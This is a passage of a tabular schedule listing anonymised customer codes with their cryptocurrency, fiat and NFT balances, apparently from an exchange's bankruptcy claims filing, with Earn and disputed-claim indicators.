| 07318222 | | USD[10.00] | | |
| 07318225 | | DOGE[667.99880676], TRX[1], USD[0.48] | | |
| 07318226 | | USD[10.00] | | |
| 07318227 | | DOGE[1.00724488], USD[0.00] | | |
| 07318228 | | BTC[.00020736], USD[0.00] | | |
| 07318229 | | BRZ[1], TRX[2], USD[0.00] | | |
| 07318230 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], UNI[0], USD[0.00] | | |
| 07318231 | | USD[10.00] | | |
| 07318232 | | USD[10.00] | | |
| 07318234 | | USD[10.00] | | |
| 07318237 | | DOGE[6674.65], SUSHI[30.969], USD[20.04] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318243 | | USD[10.00] | | |
| 07318246 | | USD[10.00] | | |
| 07318247 | | USD[10.00] | | |
| 07318249 | | CUSDT[1], DOGE[315.95416259], USD[0.00] | | |
| 07318251 | | USD[10.69] | Yes | |
| 07318252 | | USD[10.00] | | |
| 07318254 | | USD[10.00] | | |
| 07318255 | | BAT[0], BRZ[2], BTC[.00716615], CUSDT[5], DOGE[5], ETH[.09144603], ETHW[.09144603], TRX[3], USD[0.00] | | |
| 07318256 | | USD[10.00] | | |
| 07318257 | | CUSDT[8], USD[0.00] | Yes | |
| 07318258 | | CUSDT[2], DOGE[153.97814246], USD[0.45] | | |
| 07318260 | | BRZ[1], CUSDT[2], DOGE[549.03621532], TRX[2], USD[0.00] | | |
| 07318265 | | DOGE[0.92595424], ETH[.045852], ETHW[.045852], SHIB[0], USD[0.52], USDT[0.00644100] | | |
| 07318266 | | USD[10.00] | | |
| 07318267 | | BRZ[1], USD[10.00] | | |
| 07318270 | | USD[0.00] | | |
| 07318271 | | TRX[1], USD[0.00] | | |
| 07318276 | | DOGE[.648], USD[0.00] | | |
| 07318277 | | BTC[0], CUSDT[.996], USD[0.02], USDT[0.00030455] | | |
| 07318281 | | USD[10.00] | | |
| 07318284 | | USD[10.00] | | |
| 07318285 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00035494] | | |
| 07318287 | | BAT[.996], USD[0.00] | | |
| 07318288 | | ETH[.00000001], USD[0.01] | Yes | |
| 07318289 | | BTC[.00054003], DOGE[1], USD[0.00] | | |
| 07318291 | | BAT[1.55323918], BF_POINT[500], BRZ[2], BTC[0], DAI[0], DOGE[7.29314100], GRT[1.00379712], LINK[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07318295 | | USD[10.00] | | |
| 07318296 | | BRZ[1], DOGE[3475.81551104], USD[0.00] | Yes | |
| 07318297 | | USD[10.00] | | |
| 07318299 | | USD[10.00] | | |
| 07318300 | | BAT[1], BRZ[1], CUSDT[12], DOGE[5], ETH[0], ETHW[0], GRT[1], SHIB[2], SOL[.00000815], TRX[4], USD[0.00] | Yes | |
| 07318304 | | BTC[.0000848], DOGE[.146], ETH[.000004], ETHW[.000004], USD[0.60] | | |
| 07318307 | | USD[10.00] | | |
| 07318308 | | BTC[.000005] | | |
| 07318309 | | USD[10.00] | | |
| 07318310 | | USD[10.00] | | |
| 07318311 | | USD[10.00] | | |
| 07318314 | | CUSDT[2], DOGE[3067.53480749], LTC[.49943777], USD[0.00] | | |
| 07318316 | | BTC[0], DOGE[0], GRT[0] | | |
| 07318317 | | ETH[.00562363], ETHW[.00562363], USD[0.00] | | |
| 07318318 | | USD[10.00] | | |
| 07318319 | | USD[10.00] | | |
| 07318320 | | USD[10.00] | | |
| 07318321 | | USD[10.00] | | |
| 07318322 | | USD[20.00] | | |
| 07318323 | | CUSDT[3], DOGE[1123.77618117], LINK[1.98563406], SHIB[74667.14645555], SOL[3.05519409], SUSHI[2.03396736], TRX[208.12520713], USD[0.02] | | |
| 07318325 | | USD[10.00] | | |
| 07318326 | | USD[10.00] | | |
| 07318329 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07318330 | | BRZ[2], CUSDT[4], DOGE[249.37593049], TRX[4], USD[0.00] | | |
| 07318331 | | USD[0.09], USDT[0] | Yes | |
| 07318333 | | USD[10.00] | | |
| 07318337 | | BTC[.00000078], DOGE[.49860211], LINK[.00299083], TRX[1], UNI[.00000021], USD[0.01] | | |
| 07318338 | | DOGE[181.39648446], USD[0.00] | | |
| 07318339 | | BTC[.00399656], CUSDT[11], DOGE[51.28406351], ETH[.02624841], ETHW[.02591985], GRT[54.99769749], LINK[.68962405], SUSHI[1.13171433], TRX[139.34649884], USD[0.00] | Yes | |
| 07318340 | | BRZ[1], CUSDT[3], DOGE[0], TRX[1], USD[0.01] | | |
| 07318341 | | USD[10.00] | | |
| 07318342 | | BTC[0], DOGE[0], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318343 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07318344 | | USD[10.00] | | |
| 07318345 | | USD[10.00] | | |
| 07318348 | | BTC[.00021522], DOGE[1], NFT (516648095054229230/Entrance Voucher #2065)[1], USD[0.00] | Yes | |
| 07318350 | | BTC[.00001185], USD[95.20] | | |
| 07318352 | | USD[10.00] | | |
| 07318354 | | CUSDT[1], DOGE[2.11909518], USD[0.00] | | |
| 07318355 | | ETHW[7.223988], USD[0.67] | | |
| 07318356 | | USD[10.00] | | |
| 07318357 | | USD[10.00] | | |
| 07318358 | | USD[0.01] | | |
| 07318359 | | BTC[.01885324], DOGE[.00451906], ETH[.30711224], ETHW[.25515868], LINK[51.11987809], LTC[1.36646634], USD[0.00], USDT[0] | Yes | |
| 07318362 | | BAT[1], CUSDT[2], SHIB[1808769.97773722], USD[0.00] | | |
| 07318364 | | BTC[.04611837], DOGE[0], LINK[32.94604729], USD[15.42] | | |
| 07318365 | | DOGE[271.90800000], USD[514.46] | | |
| 07318366 | | CUSDT[3], DOGE[.64091659], USD[128.01] | | |
| 07318367 | | BAT[0], DOGE[0], ETH[.00000001] | | |
| 07318368 | | DOGE[6000], USD[175.54] | | |
| 07318370 | | BAT[0], BTC[0], ETH[0], GRT[0], LINK[0], PAXG[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07318371 | | BTC[0], PAXG[0], SOL[0], USD[0.08] | Yes | |
| 07318372 | | BTC[.00001383] | | |
| 07318375 | | DOGE[.56], USD[0.00] | | |
| 07318376 | | USD[10.00] | | |
| 07318377 | | DOGE[697.1313165], USD[0.00] | | |
| 07318378 | | USD[10.00] | | |
| 07318379 | | USD[10.00] | | |
| 07318380 | | USD[10.00] | | |
| 07318382 | | BRZ[1], CUSDT[1], DOGE[6347.57200283], TRX[8388.03071342], USD[0.00] | Yes | |
| 07318383 | | USD[10.00] | | |
| 07318384 | | CUSDT[1], DOGE[1642.59644406], ETH[.03037652], ETHW[.03037652], USD[10.00] | | |
| 07318386 | | USD[10.00] | | |
| 07318388 | | BTC[0], DOGE[2], ETH[0.00003219], ETHW[3.52556018], LINK[0], SOL[0], SUSHI[0], USD[4483.95] | Yes | |
| 07318394 | | DOGE[.995], USD[0.00] | | |
| 07318395 | | USD[10.00] | | |
| 07318396 | | BTC[.0304], DOGE[0], ETH[0], ETHW[0], NEAR[58.3], USD[0.35], USDT[0.00002266] | | |
| 07318397 | | GRT[1.00019173], NFT (549006748245793782/Entrance Voucher #3589)[1], SOL[25.38081959], USD[5004.34], USDT[0] | Yes | |
| 07318398 | | BCH[.0078984], BTC[.00018855], CUSDT[9], DOGE[8374.41220283], ETH[.00840187], ETHW[.00840187], LINK[1.01723326], LTC[2.26905756], TRX[3], USD[0.00] | | |
| 07318399 | | CUSDT[2], DOGE[513.96173857], SUSHI[3.20102137], TRX[1685.71161275], USD[14.32] | | |
| 07318403 | | USD[10.00] | | |
| 07318404 | | USD[10.00] | | |
| 07318405 | | DOGE[.244], TRX[150.168094], USDT[3.91446306] | | |
| 07318407 | | BAT[1], CUSDT[1], GRT[1], TRX[5], USD[0.01] | | |
| 07318408 | | DOGE[350.592], USD[0.36] | | |
| 07318409 | | USD[10.00] | | |
| 07318413 | | SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07318414 | | DOGE[5029.21539193], USD[8.55] | | |
| 07318417 | | DOGE[1], TRX[.00002305], USD[0.03] | Yes | |
| 07318419 | | BTC[0], DOGE[0], ETH[0] | | |
| 07318420 | | BCH[.01355775], DOGE[84.3296525], ETH[.00927607], ETHW[.00927607], USD[0.00] | | |
| 07318421 | | USD[0.03] | | |
| 07318423 | | BTC[.0001998], DOGE[97272.7814], USD[0.60] | | |
| 07318425 | | USD[10.00] | | |
| 07318426 | | SUSHI[.00000001], USD[0.00] | | |
| 07318427 | | BAT[1], BRZ[1], CUSDT[10], DOGE[1866.94507085], ETHW[.21787375], TRX[6], USD[0.01] | | |
| 07318428 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07318429 | | ETH[.00017667], ETHW[.00017667], USD[3.49] | | |
| 07318430 | | BTC[.00022987], USD[0.00] | | |
| 07318432 | | SHIB[76.54978902], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318434 | | USD[0.00] | | |
| 07318435 | | BTC[0], DOGE[0], ETH[0], USD[10.00] | | |
| 07318436 | | DOGE[1], USD[57.92] | | |
| 07318438 | | USD[10.00] | | |
| 07318439 | | USD[10.00] | | |
| 07318440 | | SHIB[1], SUSHI[2], UNI[1], USD[0.85], USDT[1] | | |
| 07318441 | | BRZ[1], DOGE[1], LINK[32.32283735], USD[0.00] | | |
| 07318444 | | DOGE[.786], ETH[.0006554], ETHW[.0006554], USD[2.29] | | |
| 07318446 | | USD[10.00] | | |
| 07318449 | | ETH[0], USD[0.02] | | |
| 07318450 | | BRZ[1], TRX[1], USD[0.01] | Yes | |
| 07318451 | | BAT[2.08196615], BRZ[3], CUSDT[2], DOGE[2], GRT[1.00140728], SUSHI[.00309428], TRX[2], USD[0.00] | Yes | |
| 07318456 | | USD[214.64] | | |
| 07318457 | | BAT[6.4416544], BRZ[5.07916841], BTC[0], CUSDT[3], DOGE[3], ETH[0.00001280], GRT[3.11182259], LINK[.00000914], SHIB[1], SOL[0.00021731], TRX[11.04808181], USD[0.00], USDT[0.00007218] | Yes | |
| 07318458 | | USD[10.00] | | |
| 07318460 | | BRZ[2], CUSDT[2], SHIB[901293.79270242], TRX[1], USD[0.28] | | |
| 07318461 | | DOGE[1], USD[0.00] | | |
| 07318462 | | BRZ[1], CUSDT[4], DOGE[2092.60174068], ETH[0], GRT[3], MATIC[431.60078792], SOL[0], SUSHI[0], TRX[5], USD[2503.06], USDT[2] | | |
| 07318463 | | CUSDT[1], ETH[.00569993], ETHW[.00563153], NFT (380633768946379612/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #66)[1], SHIB[2285.00107719], USD[0.00] | Yes | |
| 07318464 | Contingent, Disputed | DOGE[.166], USD[0.00] | | |
| 07318465 | | USD[10.00] | | |
| 07318466 | | SHIB[2], TRX[1], USD[0.00] | | |
| 07318468 | | USD[10.00] | | |
| 07318469 | | USD[10.00] | | |
| 07318470 | | USD[10.00] | | |
| 07318473 | | USD[10.00] | | |
| 07318478 | | DOGE[.56426817], TRX[1], USD[0.57] | | |
| 07318479 | | DOGE[1], USD[0.00] | | |
| 07318480 | | USD[28.30] | | |
| 07318483 | | USD[10.00] | | |
| 07318484 | | CAD[0.94], DOGE[266.043], ETH[.692307], ETHW[.692307], SOL[.1998], USD[5.59] | | |
| 07318485 | | USD[10.00] | | |
| 07318487 | | DOGE[1.00459675], USD[0.00] | | |
| 07318489 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], ETH[0], GRT[0], SUSHI[0], TRX[2], USD[0.00], USDT[1] | | |
| 07318490 | | TRX[214.21133704], USD[0.00] | | |
| 07318491 | | BRZ[0], BTC[0], CUSDT[3], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[1.99999974], USD[0.00], USDT[0] | | |
| 07318492 | | USD[0.04] | | |
| 07318495 | | USD[0.05] | | |
| 07318497 | | USD[10.00] | | |
| 07318498 | | DOGE[0], USD[0.00] | | |
| 07318499 | | DOGE[.044], USD[412.76] | | |
| 07318500 | | CUSDT[3], DOGE[.00001705], USD[0.01] | Yes | |
| 07318501 | | USD[0.00] | | |
| 07318503 | | USD[10.00] | | |
| 07318504 | | USD[10.00] | | |
| 07318505 | | USD[10.00] | | |
| 07318507 | | USD[10.00] | | |
| 07318509 | | DOGE[2371.57369607], TRX[216.96543892], USD[0.00] | | |
| 07318510 | | USD[10.00] | | |
| 07318512 | | USD[10.00] | | |
| 07318513 | | BRZ[1], BTC[.00223205], CUSDT[9], DOGE[.93270611], TRX[.00046054], USD[0.37] | Yes | |
| 07318515 | | USD[10.00] | | |
| 07318517 | | DOGE[.334], USD[1.74] | | |
| 07318518 | | USD[10.00] | | |
| 07318519 | | CUSDT[2], USD[0.00] | | |
| 07318520 | | USD[10.00] | | |
| 07318521 | | BTC[0], DOGE[.01787801], ETH[0], USD[0.00] | | |
| 07318523 | | BAT[2], BCH[0], BRZ[4], CUSDT[6], DOGE[0], ETH[0], ETHW[0], SHIB[1], TRX[3], USD[0.01], USDT[3] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318524 | | DOGE[596.72315446], TRX[1], USD[20.00] | | |
| 07318525 | | BAT[1], BRZ[1], BTC[0], CUSDT[1], DOGE[1], GRT[1], TRX[3], USD[0.00], USDT[2] | | |
| 07318526 | | BTC[.0088], NFT (346889314127618989/SolBunnies #2548)[1], NFT (444686127300593275/Solana Series #1)[1], NFT (456016446451721074/NFTee)[1], NFT (496060660059401540/Solana Series #1 #2)[1], NFT (506880423844889653/NFTea)[1], NFT (555861409452606589/SolBunnies #1180)[1], TRX[19173.572], USD[2205.61] | | |
| 07318529 | | USD[0.00] | | |
| 07318533 | | DOGE[2.00001203], USD[33.78] | | |
| 07318535 | | DOGE[0], USD[0.00] | | |
| 07318536 | | DOGE[2208.79635899], USD[0.00] | Yes | |
| 07318537 | | BRZ[1], CUSDT[4], TRX[4167.43079206], USD[0.77] | | |
| 07318538 | | DOGE[.818], USD[0.06] | | |
| 07318540 | | TRX[.2272], USD[0.00] | | |
| 07318541 | | USD[10.00] | | |
| 07318543 | | DOGE[.0001645], TRX[3], USD[0.00] | | |
| 07318545 | | CUSDT[.00068694], DOGE[.00118533], USD[0.84] | | |
| 07318546 | | USD[10.00] | | |
| 07318547 | | USD[12.70] | | |
| 07318549 | | BTC[0.00112574], CUSDT[4], DOGE[4344.94713912], KSHIB[131.06412404], NFT (388721162226331370/Medical Cannabis #0020)[1], SHIB[2659092.38038222], SOL[1.22863018], USD[0.00] | Yes | |
| 07318550 | | DOGE[0.42758368], USD[0.00] | | |
| 07318551 | | BTC[.00021632], CUSDT[1], USD[0.00] | Yes | |
| 07318554 | | CUSDT[4], DOGE[826.06823173], SOL[1.27625928], USD[0.01] | | |
| 07318555 | | USD[62.80], USDT[0] | | |
| 07318557 | | USD[10.00] | | |
| 07318560 | | DOGE[2.54084753], USD[0.01] | | |
| 07318561 | | BTC[0.00088997], ETH[1.13859969], ETHW[1.13859969], LINK[72.1208723], SOL[20.73122], USD[0.00] | | |
| 07318562 | | BTC[0], USD[0.00] | | |
| 07318565 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07318566 | | DOGE[2.997], USD[0.00] | | |
| 07318567 | | DOGE[20.31922849], USD[0.00] | | |
| 07318568 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07318569 | | BTC[0], ETH[0], GRT[0], LINK[0], SOL[0], USD[0.00] | Yes | |
| 07318570 | | ETH[.00549944], ETHW[.00549944], USD[0.00] | | |
| 07318571 | | AAVE[9.8892477], BAT[5.36477298], BCH[0], BRZ[4], BTC[0], CUSDT[12], DAI[0], DOGE[5.03314872], ETH[0], LINK[1.07831436], LTC[0], SHIB[5], SOL[0], TRX[7], UNI[0], USD[0.00], USDT2.09546096] | Yes | |
| 07318572 | | BAT[1.47794639], ETH[0], GRT[0], LTC[0], USD[0.00] | | |
| 07318574 | | DOGE[46.284], GRT[.983], TRX[.799], USD[0.22] | | |
| 07318575 | | USD[0.10] | | |
| 07318576 | | CUSDT[4], DOGE[1], USD[0.01] | | |
| 07318578 | | BRZ[1], BTC[0], CUSDT[5], DOGE[1.00003478], ETH[.00000023], ETHW[.00000023], TRX[1], USD[0.00] | Yes | |
| 07318579 | | USD[10.00] | | |
| 07318580 | | USD[0.00] | | |
| 07318584 | | DOGE[1359.94140638], USD[0.00] | | |
| 07318586 | | USD[10.00] | | |
| 07318587 | | AAVE[0], BAT[3], BCH[0], BRZ[1], DOGE[1], ETH[0], ETHW[0], GRT[1], LINK[0], MATIC[0], MKR[0], SHIB[4], SOL[0], SUSHI[0], TRX[1], USD[1555.13], USDT[0], WBTC[0], YFI[0] | | |
| 07318588 | | USD[10.00] | | |
| 07318589 | | CUSDT[2], DOGE[1724.8758375], SHIB[1375894.33131535], USD[0.00] | | |
| 07318590 | | USD[10.00] | | |
| 07318591 | | ETH[.00000001], ETHW[0], USD[0.13] | | |
| 07318595 | | BAT[.124], BTC[.00004], DOGE[24.975], SHIB[2520917.02894077], SOL[.000001], USD[102.94] | | |
| 07318596 | | USD[10.00] | | |
| 07318598 | | DOGE[.01515892], TRX[1], USD[0.00] | | |
| 07318600 | | BRZ[1], CUSDT[5], DOGE[3], SUSHI[1], TRX[2], USD[0.00], USDT[2] | | |
| 07318602 | | USD[10.00] | | |
| 07318608 | | USD[10.00] | | |
| 07318609 | | BRZ[0], BTC[0.00000456], DOGE[2.89569235], ETH[0], LINK[0], LTC[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07318611 | | USD[10.00] | | |
| 07318613 | | DOGE[0], ETH[0], LINK[0], TRX[2336.61600000], USD[0.05] | | |
| 07318618 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07318622 | | BAT[2], BRZ[2], CUSDT[8], DOGE[20188.56978054], ETH[3.0583842], ETHW[3.05707175], LTC[1.87985318], SHIB[16], TRX[11], USD[1931.13], USDT[1.07502746] | Yes | |
| 07318623 | | DOGE[0], USD[0.00] | | |
| 07318627 | | BRZ[3], CUSDT[1], ETHW[.12803257], GRT[1], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318629 | | USD[10.00] | | |
| 07318630 | | USD[0.04] | | |
| 07318631 | | BAT[1], BRZ[3], BTC[.00001374], CUSDT[11], DOGE[1.06179242], SHIB[2226980.46396018], TRX[7], USD[0.39], USDT[3] | | |
| 07318632 | | USD[10.00] | | |
| 07318634 | | DOGE[2440.47822285], TRX[1], USD[0.00] | | |
| 07318635 | | USD[0.00] | | |
| 07318636 | | DOGE[.589], USD[0.92] | | |
| 07318638 | | CUSDT[2], DOGE[844.49632943], USD[0.00] | | |
| 07318639 | | CUSDT[2], DOGE[6141.54935336], TRX[1], USD[2.32] | | |
| 07318640 | | DOGE[159.59111479], USD[0.00] | | |
| 07318641 | | CUSDT[3], USD[0.00] | | |
| 07318643 | | BTC[.00062684], CUSDT[1], DOGE[235.25955002], LINK[2.50536789], SOL[9.21390927], TRX[2], USD[397.31], YFI[.00013347] | Yes | |
| 07318645 | | USD[10.00] | | |
| 07318646 | | USD[10.00] | | |
| 07318650 | | DOGE[1], SHIB[443454.73314217], USD[0.00] | Yes | |
| 07318653 | | USD[10.00] | | |
| 07318658 | | USD[10.00] | | |
| 07318660 | | DOGE[1], USD[0.00] | | |
| 07318662 | | TRX[1], USD[0.01] | | |
| 07318664 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07318665 | | BTC[0], DOGE[0] | | |
| 07318666 | | BAT[0], BCH[0], BRZ[9.34727661], BTC[0.00000010], CUSDT[32], DOGE[2], ETH[0], GRT[1.00050239], LINK[0], SHIB[34.38096422], TRX[14.00025571], USD[109.80], USDT[2.03155921] | Yes | |
| 07318669 | | USD[10.00] | | |
| 07318671 | | SUSHI[26.394], TRX[.428], USD[9.37] | | |
| 07318672 | | CUSDT[3], DOGE[.00004143], TRX[3], USD[0.08] | | |
| 07318674 | | SHIB[48874.33550792], USD[0.00] | | |
| 07318675 | | DOGE[0] | | |
| 07318676 | | BTC[.0028884], USD[14.95] | | |
| 07318678 | | USD[10.00] | | |
| 07318680 | | USD[10.00] | | |
| 07318681 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07318682 | | CUSDT[3], DOGE[475.79934776], SHIB[1], TRX[2], USD[0.00] | | |
| 07318683 | | USD[10.00] | | |
| 07318684 | | TRX[1], USD[0.00] | | |
| 07318685 | | NFT (360657230279843203/Coachella x FTX Weekend 2 #23503)[1] | | |
| 07318686 | | BRZ[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07318687 | | BRZ[3], BTC[0], CUSDT[3], DOGE[0], ETH[0], SUSHI[1], TRX[3], USD[0.00], USDT[2] | | |
| 07318689 | | NFT (314162057498976335/tekw #149)[1], NFT (323591784330704113/Caligo)[1], NFT (332485022535950389/tekw #088)[1], NFT (379449385005684084/The Historians #3703)[1], NFT (383892438357664935/Cyblob Magician)[1], NFT (398926533994449216/Oriental Knight)[1], NFT (425634176790155129/Boopie Gen 1N #1797)[1], NFT (436772887060742067/Boopie Gen 1E #154)[1], NFT (472759479445130726/MH #2912)[1], NFT (475694025588563323/Boopie Gen 1E #129)[1], NFT (477139343934342601/Boopie Gen 1W #768)[1], NFT (500645069261986978/Boopie Gen 1W #188)[1], NFT (515041159877623301/MH #2913)[1], NFT (543192472891028275/tekw #175)[1], NFT (555875717863933206/Spellbound Sunday)[1], NFT (560605595255044678/tekw #019)[1], NFT (563348362251288470/Boopie Gen 1E #534)[1], NFT (570870670644742336/Boopie Gen 1N #103)[1] | Yes | |
| 07318690 | | USD[10.00] | | |
| 07318692 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0.00070057], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07318693 | | USD[10.00] | | |
| 07318694 | | BTC[0], DOGE[399.35421024], MATIC[72.69399903], SOL[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07318695 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07318696 | | BRZ[2], BTC[.00280536], CUSDT[2], DOGE[6078.70604085], TRX[203.89288736], USD[12.57] | | |
| 07318697 | | USD[0.00] | | |
| 07318698 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07318699 | | USD[0.00] | | |
| 07318700 | | CUSDT[2], DOGE[1], MATIC[123.47100986], USD[0.00] | | |
| 07318701 | | BRZ[1], CUSDT[1], DOGE[6], TRX[7], USD[0.01] | | |
| 07318702 | | BTC[0.00009280], DOGE[0.03041364], USD[0.08] | | |
| 07318704 | | USD[10.00] | | |
| 07318708 | | DOGE[5164.92588844], TRX[1], USD[0.00] | | |
| 07318709 | | USD[10.00] | | |
| 07318711 | | BTC[0], DOGE[51.51752955], USD[0.00], USDT[0] | | |
| 07318713 | | DOGE[.03772812], USD[0.00] | | |
| 07318714 | | CUSDT[2], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318715 | | BAT[1], BRZ[3], BTC[.00986757], CUSDT[3], DOGE[1], ETHW[.00079803], SHIB[1], TRX[1], UNI[1.04047718], USD[0.00] | Yes | |
| 07318716 | | USD[11.07] | Yes | |
| 07318717 | | DOGE[2.57257399], USD[30.33] | | |
| 07318718 | | SUSHI[.56344532], USD[0.00] | | |
| 07318720 | | BTC[.00018793], CUSDT[1], DOGE[26.029838], USD[0.00] | | |
| 07318721 | | CUSDT[1], ETH[0.29177991], ETHW[0.29158839], LINK[.02763785], USD[0.00] | Yes | |
| 07318724 | | USD[10.00] | | |
| 07318725 | | BTC[0], DOGE[134.68892515], LTC[0.05402204], PAXG[.00000012], SHIB[11910.58597218], SOL[1.09002412], TRX[138.91188030], USD[0.00] | | |
| 07318726 | | CUSDT[2], TRX[1], USD[177.33] | | |
| 07318728 | | USD[10.00] | | |
| 07318729 | | DOGE[1], USD[14.80] | | |
| 07318730 | | USD[0.01] | | |
| 07318731 | | BAT[8.76911974], BF_POINT[300], BRZ[5.05400632], BTC[.00000024], CUSDT[8], DOGE[.08193477], ETHW[4.5033395], LINK[.00170101], LTC[.00015578], MATIC[.00794099], SHIB[6], SOL[.00136712], SUSHI[3.65661195], TRX[18.60067022], USD[0.04], USDT[1.00486134] | Yes | |
| 07318732 | | BRZ[1], CUSDT[4], DOGE[10036.11105386], SHIB[1421954.81789227], USD[0.00] | Yes | |
| 07318733 | | DOGE[0], USD[0.00] | | |
| 07318734 | | USD[10.00] | | |
| 07318735 | | BTC[0], USD[0.21] | | |
| 07318736 | | BTC[.00000969], DOGE[6764.01], USD[0.41] | | |
| 07318738 | | SOL[1.02], USD[1.96] | | |
| 07318739 | | BAT[1.01086194], BTC[0], CUSDT[2], DOGE[1], ETH[.00001009], ETHW[.00001009], SOL[0.96838737], USD[0.00] | Yes | |
| 07318740 | | USD[10.00] | | |
| 07318741 | | TRX[1], USD[0.00] | Yes | |
| 07318742 | | USD[10.00] | | |
| 07318744 | | CUSDT[7], DOGE[1], ETH[0], TRX[2], USD[0.82] | | |
| 07318748 | | BRZ[1], CUSDT[2290.67040084], DOGE[4], TRX[1], USD[0.01] | | |
| 07318749 | | DOGE[1], ETH[0.00609490], ETHW[0.00609490], USD[0.00] | | |
| 07318750 | | DOGE[759.7343615], USD[0.00] | Yes | |
| 07318751 | | DOGE[0], USD[0.30] | | |
| 07318752 | | USD[10.00] | | |
| 07318754 | | USD[10.00] | | |
| 07318756 | | BRZ[0], DOGE[0], TRX[3.38666369], USD[0.00], USDT[0] | | |
| 07318757 | | BRZ[3], CUSDT[2], DOGE[1], ETH[0], GRT[1], LTC[0], USD[0.01] | | |
| 07318758 | | USD[134.03] | | |
| 07318759 | | USD[0.26] | | |
| 07318760 | | USD[10.00] | | |
| 07318761 | | ETH[.00618412], ETHW[.00618412], USD[0.00] | | |
| 07318763 | | DOGE[30.034], USD[0.02] | | |
| 07318765 | | DOGE[0.35110817], ETH[.00092], SOL[8.12187], SUSHI[.409], TRX[5958.07300000], USD[0.38] | | |
| 07318766 | | CUSDT[11], DOGE[6.01174318], ETH[0], NFT [513863764357284552/Entrance Voucher #1904][1], NFT [572866034171507310/Humpty Dumpty #308][1], SHIB[4], SOL[0], TRX[2.000008], USD[0.01], USDT[0.00000001] | Yes | |
| 07318768 | | DOGE[1], USD[0.55] | Yes | |
| 07318770 | | USD[10.00] | | |
| 07318773 | | DOGE[3.89899912], SOL[0], USD[0.00] | | |
| 07318774 | | BAT[1], BRZ[2], BTC[.00051769], CUSDT[6], DOGE[3.42012646], ETH[.03786761], ETHW[.03786761], LTC[.29614333], TRX[8], USD[0.62] | | |
| 07318775 | | USD[10.00] | | |
| 07318777 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], EUR[0.00], LINK[0], LTC[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07318781 | | USD[10.00] | | |
| 07318783 | | ETH[.00000001], ETHW[0], UNI[0], USD[0.00] | | |
| 07318787 | | DOGE[69.78930051], SOL[.09967304], USD[0.00] | | |
| 07318789 | | BRZ[0], BTC[0], DOGE[0.25619420], ETH[0], ETHW[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07318791 | | USD[10.00] | | |
| 07318793 | Contingent, Disputed | BTC[0], DOGE[0.69800000], ETH[0], SUSHI[0.48100000], USD[0.00], USDT[3.53220237] | | |
| 07318795 | | BTC[0], DOGE[2188.39313312], ETH[0], SHIB[1397265.57448755], USD[0.00] | Yes | |
| 07318796 | | USD[10.00] | | |
| 07318797 | | GRT[4.30547207], TRX[.00000304], USD[0.00] | | |
| 07318800 | | BRZ[1], BTC[0], CUSDT[1], GRT[1.00498957], TRX[1], USD[0.04], USDT[1.10861729] | Yes | |
| 07318801 | | USD[10.00] | | |
| 07318805 | | USD[10.00] | | |
| 07318806 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318807 | | BTC[0], DOGE[0], USD[0.05], USDT[0.00000078] | | |
| 07318810 | | USD[10.00] | | |
| 07318811 | | DOGE[0.23120731], USD[0.33] | | |
| 07318814 | | BRZ[1], CUSDT[1], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07318817 | | DOGE[116.06959114], USD[0.00] | | |
